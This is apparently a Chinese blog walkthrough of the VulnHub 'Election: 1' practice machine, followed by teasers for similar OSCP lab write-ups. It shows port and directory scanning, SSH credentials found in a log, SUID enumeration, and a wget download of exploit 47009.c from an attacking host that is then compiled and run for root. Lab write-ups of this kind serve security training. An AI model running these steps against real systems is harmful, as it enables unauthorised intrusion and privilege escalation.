代码编织梦想

靶机地址:https://www.vulnhub.com/entry/election-1,503/

深入交流学习:webMsec

安装靶机

主机发现

靶机ip 192.168.160.130

信息收集

nmap -sS -sV -A -p- ip -oN election.nmap

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

MAC Address: 00:0C:29:A9:88:C3 (VMware)

查看80

dirsearch -u ip -r -o report.txt

在robots.txt目录发现

election可访问

得到这个界面,查看了源码,没有发现,继续深入扫目录

在/admin/logs/ 发现system.log

获得love/P@$$w0rd@123

登录SSH

find / -perm -u=s -type f 2>/dev/null

看看SUID提权

searchsploit serv Pri

搭建http

wget 192.168.160.173:1234/47009.c

gcc -o exp 47009.c

./exp

得到root

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51045322/article/details/127129114

Vulnhub-OSCP靶机实战-爱代码爱编程

前言 这个靶机适合新手,因为步骤很短很短 靶机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/ KALI地址:192.168.241.108 靶机地址:192.168.241.170 一.信息收集 1.主机发现 使用命令如下 netdiscover -r 192.

oscp-vulnhub:gitroot靶机实战_cjstang的博客-爱代码爱编程

一、前言 主要利用方式:hydra 密码破解+git show 反弹shell获取平行账号权限+git 命令提权 二、靶机信息     靶场: vulnhub.com     靶机名称: GitRoot: 1     难度: 高难度     发布时间: 2020 年 6 月 3 日  

oscp-vulnhub:ha-wordy靶机实战_cjstang的博客-爱代码爱编程

----------------------------------------------------------------------------------------------------------- 前置:本文题干阅读时间推荐10min,靶场练习推荐4h ------------------------------

vulnhub-tiki - 类oscp靶机攻略1_雨天呀的博客-爱代码爱编程

vulnhub-Tiki Date: 07/14/2022 Difficulty: Easy Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l https://www.vulnhub.com/entry/tiki_1,525/ 信息搜集 端口扫描 目录扫描 ➜ ~ dirsearch

oscp - vulnhub billy madison: 1.1 靶机测试_m0_55751267的博客-爱代码爱编程

仅以此文来记录我的oscp靶场训练过程  Billy Madison: 1.1 ~ VulnHub 拿到了靶机之后改为桥接导入VMware kali和靶机全部上线后,nmap扫描 192.168.165.0/24  发现靶机ip为192.168.165.156  hping3 nmap  先跑一下ssh的弱口令 虽然没啥用

oscp-vulnhub靶机记录-lordoftheroot-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 交流学习联系:webMsec 靶机安装 主机发现 靶机ip 192.168.160.131 使用nmap扫描后发现只开放了22 ssh 尝试连接ssh 这里需要端口碰撞 再次nmap扫描 1337端

oscp-vulnhub靶机记录-digitalworldlocal-fall_mr. m2021的博客-爱代码爱编程

vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。 深入交流学习:webMsec 靶机下载地址; https://www.vulnhub.com/entry/digitalworldlocal-fall,726/ 一、安装靶机 这里可以得到靶机ip 192.168.179.132 二、信息收集 很多人用nmap,我一

oscp-vulnhub靶机记录-hack me please walkthrough_mr. m2021的博客-爱代码爱编程

机器地址: https://www.vulnhub.com/entry/hack-me-please-1,731/ 深入交流学习:webMsec 安装好靶机: 主机发现: arp-scan -l 信息收集一波: ./nmapAutomator.sh -H 192.168.52.133 -t All PORT

oscp-vulnhub靶机记录-bravery-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ 深入交流学习:webMsec 安装靶机 打开kali,扫存活主机 nmap -sP 192.168.160.0/24 靶机ip 192.168.160.128 扫一波端口和服务: ./nmapAuto

oscp-vulnhub靶机记录-goldeneye-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/goldeneye-1,240/   深入交流学习:webMsec 安装靶机 主机发现 sudo arp-scan -l 192.168.52.136 信息收集 nmap -sS -sV -T5 -A -p- 192.168.52.136 运行了邮件服务,先

oscp-vulnhub靶机记录-development-walkthrough_mr. m2021的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/digitalworldlocal-development,280/ 深入交流学习:webMsec 主机发现 Nmap -sS 192.168.52.0/24 得到靶机ip 192.168.52.137 信息收集 nmap -sS -sV -A -p- -T5 192.

oscp-vulnhub靶机记录-literallyvulnerable-walkthrough_weixin_44499830的博客-爱代码爱编程

靶机地址 https://www.vulnhub.com/entry/ua-literally-vulnerable,407/ 快刷10个vulnhub的OSCP like靶机了,感觉都比较相似,本质上就是细致的信息收集,然后找老洞exp拿shell,最后提权,比较有意义的在于可以积累完善cheat-sheet,等这个靶机刷完,就去htb了。 主